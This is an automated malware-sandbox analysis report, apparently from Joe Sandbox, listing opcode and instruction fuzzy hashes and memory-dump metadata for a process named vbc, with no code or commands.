                                                                                                                        • Instruction ID: d7e77bd35587afec290576de686fd908222e04e323ba6b7af3efa31e7abb2761
                                                                                                                        • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                        • Instruction Fuzzy Hash: 45314972B04B00EFD761CFA9DE41B57B7FDBB08A50F08492DA59AD3650E670E800CB61
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 39745bbf51442e02a4f46d8fac307de877dcdf83e7a8ab2628ac945fe88dbdbb
                                                                                                                        • Instruction ID: fa9a3bac18db89b32a85fcc96d9610b1c2952e365e62426b0a122b59d56a0f47
                                                                                                                        • Opcode Fuzzy Hash: 39745bbf51442e02a4f46d8fac307de877dcdf83e7a8ab2628ac945fe88dbdbb
                                                                                                                        • Instruction Fuzzy Hash: D431F671B042459FCB29EFA4C985E6FB7FABB80314F008429D846D3654EB30E981CB90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9a514368c0a3a5d9d87c8724d2e6e56a537c0e38972a16c09f54d183f87bfd8f
                                                                                                                        • Instruction ID: fc843beb01a5ed4bbacac4f16de4e1670e34a1d3e2e328450140d63ce339fce7
                                                                                                                        • Opcode Fuzzy Hash: 9a514368c0a3a5d9d87c8724d2e6e56a537c0e38972a16c09f54d183f87bfd8f
                                                                                                                        • Instruction Fuzzy Hash: 6A31A231A0193C9BDB31DB14CC42FFA77BEEB05740F1101A5E645A7290D6B4AE909F90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d066caf9df7ddf0ff119ac416e5b96377d1df2c2dcf5a429cd98552ec1ce1f55
                                                                                                                        • Instruction ID: 6045fc685e4f7b57fc2aaf9886b933a572e12166e55af5f52db75adec9499de2
                                                                                                                        • Opcode Fuzzy Hash: d066caf9df7ddf0ff119ac416e5b96377d1df2c2dcf5a429cd98552ec1ce1f55
                                                                                                                        • Instruction Fuzzy Hash: 5E31E5756003109BCB38BF24C845BB977B5BF40314F9485A9FC4A9B381DE74A986CBA0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                        • Instruction ID: 8cf1d5b54151f37f919a25aea36c282055d87090c4d4dd501b4956a63966800e
                                                                                                                        • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                        • Instruction Fuzzy Hash: 7C214B36B0066DA6CB26ABA48844EBEB7F4EF40710F40941AFDA5876D1E638DD50C7A0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                        • Instruction ID: 023c3e184c02561349e5a3f3f2de4710a16df07c8a9f25d45acefdd5222060bc
                                                                                                                        • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                        • Instruction Fuzzy Hash: 9D216D32E00608ABCF15DF98C9C4A8ABBB5FF48714F10C469ED159B245D675EA458B90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3d4c94df2c8ac4ecc4f7161215c03f564c413ab2afe46602a2e557c9cbe9491f
                                                                                                                        • Instruction ID: 301c573d6042d93d8fa7464faef5d9f0fb5b4040a2782b51e4a5de14dc27a5e8
                                                                                                                        • Opcode Fuzzy Hash: 3d4c94df2c8ac4ecc4f7161215c03f564c413ab2afe46602a2e557c9cbe9491f
                                                                                                                        • Instruction Fuzzy Hash: 3121C172A087459BCB21DF18C984F6B77E9FB88760F04891DFE559B244D7B0E900CBA2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 92bd6d0db0926fa2839fb7a21c24b8b804cedf3a0150abe22aa4803c27a18ad0
                                                                                                                        • Instruction ID: b5a2b8e817826fa0621c3c8520d1c6b71d3de3c0e7c755a13f9345a13a0f79bb
                                                                                                                        • Opcode Fuzzy Hash: 92bd6d0db0926fa2839fb7a21c24b8b804cedf3a0150abe22aa4803c27a18ad0
                                                                                                                        • Instruction Fuzzy Hash: 3331B476610215EFCB14CF58C484DEEB7BAFFC4304B114859E8099B3A0EB71EA50CB90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                        • Instruction ID: 800a083931f82f4253772528c55720088c51abdd243f60337018b8315c419537
                                                                                                                        • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                        • Instruction Fuzzy Hash: BD31AB31600A14EFDB25DFA8C885F6AB7F9FF45354F1049A9E5128B690E770EE01CB50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                                                                                                        • Instruction ID: 906b8c334009c2472e158edfebea4b68056a3682091b41040f570625da0320ae
                                                                                                                        • Opcode Fuzzy Hash: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                                                                                                        • Instruction Fuzzy Hash: 0E2136F9705A40ABEB29D729C909B77B7DABF41750F0904A0FD028BAD1E3A49C418610
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7b018a981fc4664a0225b3748753b7ea91d5376cffd9155132bb5809bf49e482
                                                                                                                        • Instruction ID: 507818549fb608ed7703eacf0e68e89c4723aef0e8530a057106a4d3a2be74fe
                                                                                                                        • Opcode Fuzzy Hash: 7b018a981fc4664a0225b3748753b7ea91d5376cffd9155132bb5809bf49e482
                                                                                                                        • Instruction Fuzzy Hash: 62217E71A106299BDF24DF69C885AFEB7F4FF48740B500069E941EB240D778AD41CBA0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8af8adeb758e8606aabee7fc0d6225f4af24128a66da6fb1a8bce151e7a82e0d
                                                                                                                        • Instruction ID: 269ad50591017094f1d4edc613a06b7697385b85a89d95ccfabffcb53485d7d9
                                                                                                                        • Opcode Fuzzy Hash: 8af8adeb758e8606aabee7fc0d6225f4af24128a66da6fb1a8bce151e7a82e0d
                                                                                                                        • Instruction Fuzzy Hash: 2621A171600644AFDB19DB68C848FAAB7F8FF48740F140069F905DBB90D674ED40CB54
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bcaa9619996d6e16325d30de912c4a379e71808871b44008245255eeb2e4be16
                                                                                                                        • Instruction ID: 00f9884705b064dc00c7205a0261a642478abc855bc62f1302a45827576a9d5e
                                                                                                                        • Opcode Fuzzy Hash: bcaa9619996d6e16325d30de912c4a379e71808871b44008245255eeb2e4be16
                                                                                                                        • Instruction Fuzzy Hash: B821F5726083459FE715DFA9C84CF9BB7DCBF81240F080956BE84CBA51D7B0E948C6A1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                        • Instruction ID: ec9128bad967665f7405c94ac1889a4988098d717cc70a72f77bb5c6c9d252d4
                                                                                                                        • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                        • Instruction Fuzzy Hash: FB01D671505B259BCB308F15D840A767BEAFF45760701892DFC958B680D776D440CF60
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 286918571f0367fda38dddfaa24a7ac4726342fad11dd81586d4573c5230ace9
                                                                                                                        • Instruction ID: 3b565ede8ce6179a2f5d6a4bf711968c06bb9a80e6370b402a2a79c542166bb0
                                                                                                                        • Opcode Fuzzy Hash: 286918571f0367fda38dddfaa24a7ac4726342fad11dd81586d4573c5230ace9
                                                                                                                        • Instruction Fuzzy Hash: 2611AD32641240EFCB26EF18CD95F56BBB8FF48B54F200065F9059B6A1D635ED01DAA0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c8ea42eaa59de601decbb926c5f09e6e8ee7f59a4d1effddfb781a3e023f6787
                                                                                                                        • Instruction ID: cc131adf1999ee15f11b9e700a33c348a5135e48ac07c11294a6fa3db6855ef1
                                                                                                                        • Opcode Fuzzy Hash: c8ea42eaa59de601decbb926c5f09e6e8ee7f59a4d1effddfb781a3e023f6787
                                                                                                                        • Instruction Fuzzy Hash: 82114870A4122CABDB39AB64CC46FE9B2B4FB04710F504194A319A60E0DB709E81CF84
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                                                                                                        • Instruction ID: 6690dd1f1ceee54ccb021933cadedbf6f9a50706c1916240581ea6e6297790fb
                                                                                                                        • Opcode Fuzzy Hash: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                                                                                                        • Instruction Fuzzy Hash: 57014C7160815567DF299BA5C906BAFFFA9EB80B90F14C01DE9075B284D774EC90C3E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0ea7aea65a6251a99741f0e0251a9a3c87569e5845a4365786bffa75e9b04c6e
                                                                                                                        • Instruction ID: edd402dcf055505690e77dcfd70484040c02147ab4c5cb3bbe939e68c5baba75
                                                                                                                        • Opcode Fuzzy Hash: 0ea7aea65a6251a99741f0e0251a9a3c87569e5845a4365786bffa75e9b04c6e
                                                                                                                        • Instruction Fuzzy Hash: 5401F532714712ABCB18BA659C45AB77BA9FF84210B400528F94587A90DF61FC10CBE0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8650f7f1a890ffac43a6bfc2e4741a44f35b386f701d1ca4dc5680b81d8b843d
                                                                                                                        • Instruction ID: 3a7ecd8cdc8cbe9c0d3a8e08336ab56a8593002118c4c28475b91cbf9b98dc9c
                                                                                                                        • Opcode Fuzzy Hash: 8650f7f1a890ffac43a6bfc2e4741a44f35b386f701d1ca4dc5680b81d8b843d
                                                                                                                        • Instruction Fuzzy Hash: 7511C4326441459FC710CF5DD801BA6BBBAFB5A314F188199E849CF315D732EC80CBA0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 67b5a8bda06400d744a97c8cec2cc1df8fcaf0205d5f7fbd8db99bdca96a9732
                                                                                                                        • Instruction ID: bdf8ba5d0edaa55b217798e2a2a075d3dfef463b3a8344d3636ca75d30da28ad
                                                                                                                        • Opcode Fuzzy Hash: 67b5a8bda06400d744a97c8cec2cc1df8fcaf0205d5f7fbd8db99bdca96a9732
                                                                                                                        • Instruction Fuzzy Hash: 7E11297390001DABCB25DB95CC85DEFBBBDEF48258F044166E906E7211EA34EA54CBE0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                        • Instruction ID: 61dcb966e186e288d1ab52c353c1f63ffeb22e4f8b97fc0fb59cec2005821209
                                                                                                                        • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                        • Instruction Fuzzy Hash: 870124362002108BDF15AA29D880FA7776BBFC4700F1A44E9FD028F255EAB1D885C790
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ff14778d6b1c68ec6a34b312da2c215263b81f8fda94997f749facd12e1f02b8
                                                                                                                        • Instruction ID: 34668284610c660029db0e557ada2b099fd212c91e8931f3f3b86ab447f544ed
                                                                                                                        • Opcode Fuzzy Hash: ff14778d6b1c68ec6a34b312da2c215263b81f8fda94997f749facd12e1f02b8
                                                                                                                        • Instruction Fuzzy Hash: CC019A32A10158ABCF21EFA9DD45EEFBFB9EB48650F450069F905E3251CA30DA11CBA0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6808e14aab2de3ec3e731a0110c59607ab5e1fe891d5c83760bd050572f5961e
                                                                                                                        • Instruction ID: 2891fd70478b807307c926f1be8c6fba6fb668213ec3f9c6587d0922377da69a
                                                                                                                        • Opcode Fuzzy Hash: 6808e14aab2de3ec3e731a0110c59607ab5e1fe891d5c83760bd050572f5961e
                                                                                                                        • Instruction Fuzzy Hash: 0F018F72301A54BBC211BB69CD88E57BBECFF856A0B00062AB50597A61DB74FC11CAA4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                        • Instruction ID: d3c2abc15f6cf372529cd343553caa62dd43d81c7a4928352e885465c6d2ad01
                                                                                                                        • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                        • Instruction Fuzzy Hash: 65012D32200B04AFDB22E665C404EB773EEFFC4250F04981EA5468B940DFB0E845CB51
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 974d3e3c8e7f50b035cd5a2e6adecb401534922e408389ee21c5a4a2992e9bb0
                                                                                                                        • Instruction ID: 12f6a65f560bc9ff9cc381bc35c7d5185ece8cabab95ef835c3a1aa4bb85c5c3
                                                                                                                        • Opcode Fuzzy Hash: 974d3e3c8e7f50b035cd5a2e6adecb401534922e408389ee21c5a4a2992e9bb0
                                                                                                                        • Instruction Fuzzy Hash: 4C116D35A0020DEBDF15EF64C855EAE7BBAFB48240F004059F90197250DB39AE11CB90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 099e6e71acb9d9679d75a45d4938facc70ea9f188e6a5b0a709491e04ace77d7
                                                                                                                        • Instruction ID: 01915de7bc8308a1f5271cec92a6a74f6fe40d60c78b08f84e68ee9713526204
                                                                                                                        • Opcode Fuzzy Hash: 099e6e71acb9d9679d75a45d4938facc70ea9f188e6a5b0a709491e04ace77d7
                                                                                                                        • Instruction Fuzzy Hash: 22115B71A0020DEBDF26EF64C854EEE7BB5FB48240F004059F90197740DA74EE11CB91
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                        • Instruction ID: 6c89905e58d9247068c23e103787ece771c1cf07c27e5b9ce5609afe7227901f
                                                                                                                        • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                        • Instruction Fuzzy Hash: E8017C322046809FD326D65EC948F3677DDFF45B50F0904A1E916CBA91D6B8EC40CA22
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6e3397506d4d380d16d4f9044fceaa4c923e36307320fbd794b8a33dc3af70ad
                                                                                                                        • Instruction ID: a63ef89c1e0659dbf87432667352b41a9a77b1440af6bb40b87b6d6109a3636e
                                                                                                                        • Opcode Fuzzy Hash: 6e3397506d4d380d16d4f9044fceaa4c923e36307320fbd794b8a33dc3af70ad
                                                                                                                        • Instruction Fuzzy Hash: 8C01F731B00B28DBD718EBA9D8549EFB7B9EF40210F5541299906A7A40EE70DD01CA90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f317aba9fec8c309a81813ca9706c17126bc757283e52f2929622a8cc9aec083
                                                                                                                        • Instruction ID: accbd46164553562b907c1cf127923305240b92dd1e7778d7eaaba2d1ec8fbc7
                                                                                                                        • Opcode Fuzzy Hash: f317aba9fec8c309a81813ca9706c17126bc757283e52f2929622a8cc9aec083
                                                                                                                        • Instruction Fuzzy Hash: 8801A772B10325ABDF219F99D9C5BEABBFDAB84B50F510025F60497201DBF0DD448754
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 06b024286a4f54ac6c7b0b23f6aecee915f4d11e83206ed4362767bee41d69ca
                                                                                                                        • Instruction ID: bbd73cd0546eebaf791a2e028348038e8ff0b9ff150cdbaafc46994e20c314cc
                                                                                                                        • Opcode Fuzzy Hash: 06b024286a4f54ac6c7b0b23f6aecee915f4d11e83206ed4362767bee41d69ca
                                                                                                                        • Instruction Fuzzy Hash: FAF0F432B41B20B7C731DB568C45F57BAEEEB84B90F104428B60597640DA70ED01CBA0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3d1c7cb1cf0cc6d391904c56c9ec873b5a670607c1af7314fa88de85fd9bd6fc
                                                                                                                        • Instruction ID: 770b0ed6e32fd1effa333a1333bb0533968b9e4cd4d17101349e5ebcad2a7a60
                                                                                                                        • Opcode Fuzzy Hash: 3d1c7cb1cf0cc6d391904c56c9ec873b5a670607c1af7314fa88de85fd9bd6fc
                                                                                                                        • Instruction Fuzzy Hash: 9401D7B1A1021DABDB04DFA9D9459DEBBF8FF48304F10446AA901E7380D674AA018BA5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                        • Instruction ID: efb43151f7fdabdacc30b9f356178b565ed6b54b237ba43237f29ddebc087dd9
                                                                                                                        • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                        • Instruction Fuzzy Hash: 1CF062B3A00615ABD334DF4DDC40E57F7EAEBC4A94F058129A955DB220EA71ED05CB90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 853bd5b29733c82e4efb7431505f27616bde73100db9842590bffb86141ed9fa
